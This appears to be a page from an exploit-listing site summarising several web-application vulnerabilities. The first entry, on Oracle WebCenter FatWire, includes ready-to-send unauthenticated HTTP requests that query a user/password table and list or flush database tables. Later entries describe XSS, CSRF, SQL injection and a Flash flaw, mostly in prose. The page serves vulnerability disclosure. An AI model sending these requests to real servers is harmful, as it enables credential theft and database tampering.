header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Oracle WebCenter FatWire Content Server < 7 - Improper Access Control

It has been discovered that there is an incorrect access control over several resources in previous versions of Fatwire (confirmed FutureTenseContentServer 5.5.2 ,7.5) that allow the sending of SQL queries and query the tables and database schema without authentication. PoC : Improper Access Control PAYLOAD : SQL query POST /cs/Satellite HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 98 tbl=AArticles&query=select+username%2Cpassword+from+systemusers&pagename=Support%2FVerify%2Fexport PAYLOAD : show all table database https://www.example.com/cs/Satellite?pagename=Support/Verify/tablelistHTML https://www.example.com/cs/Satellite?pagename=Support/CacheManager/FlushTables&cmd=null OR request POST /cs/Satellite HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 98 pagename=Support/Verify/tablelistHTML PAYLOAD : URL list ID installed Site https://www.example.com/cs/Satellite?pagename=OpenMarket/Demos/index

SAP Internet Transaction Server (ITS) 6200.X.X – Session Fixation/ Cross-Site Scripting

When an unauthenticated user navigates through the application, the application assigns a cookie, that cookie is assigned in the parameter ~ session, therefore it could be possible for an attacker to fix the fallo ~ session through a request GET. This, together with the fact that the parameter SERVICEUNIQUE has a parameter validation failure, results in a single-use XSS, since the session expires once the method of the request is exchanged and fixed in the URL.

Honeywell XL Web Controller – Cross-Site Scripting

A Cross-Site Scripting (XSS) vulnerability exists in Honeywell XL Web Controller due to improper validation of user-supplied input. An attacker can exploit this vulnerability to inject malicious script code into the application, which will be executed in the context of the user's browser. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Timber – Ultimate Freelancer Platform 1.1 – Cross site request forgery

A Cross Site Request Forgery (CSRF) vulnerability exists in Timber - Ultimate Freelancer Platform 1.1, which allows an attacker to perform malicious actions on behalf of the authenticated user. An attacker can craft a malicious HTML page that contains a form with pre-filled values and submit it to the vulnerable application. This can be used to update the user profile with malicious values.

PaulNews 1.0 – ‘keyword’ SQL Injection / Cross-Site Scripting

The vulnerability allows an attacker to inject sql commands from the search section with 'keyword' parameter. An attacker can use the GET or POST methods to exploit the vulnerability. The payloads for SQLi are boolean-based blind, error-based and AND/OR time-based blind. The payload for XSS is <script>alert(1)</script>

CVE-2015-5112

CVE-2015-5112 is a vulnerability in Adobe Flash Player 18.0.0.194 and earlier versions. It allows an attacker to execute arbitrary code on the target system by exploiting a use-after-free vulnerability in the ActionScript 3 (AS3) virtual machine. The vulnerability is triggered when a maliciously crafted SWF file is loaded by the vulnerable Flash Player.

ASP.NET jVideo Kit – ‘query’ SQL Injection

The vulnerability allows an attacker to inject sql commands from the search section with 'query' parameter. You can use the GET or POST methods. The vulnerable payloads are AND boolean-based blind - WHERE or HAVING clause and Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN).

Recent Exploits: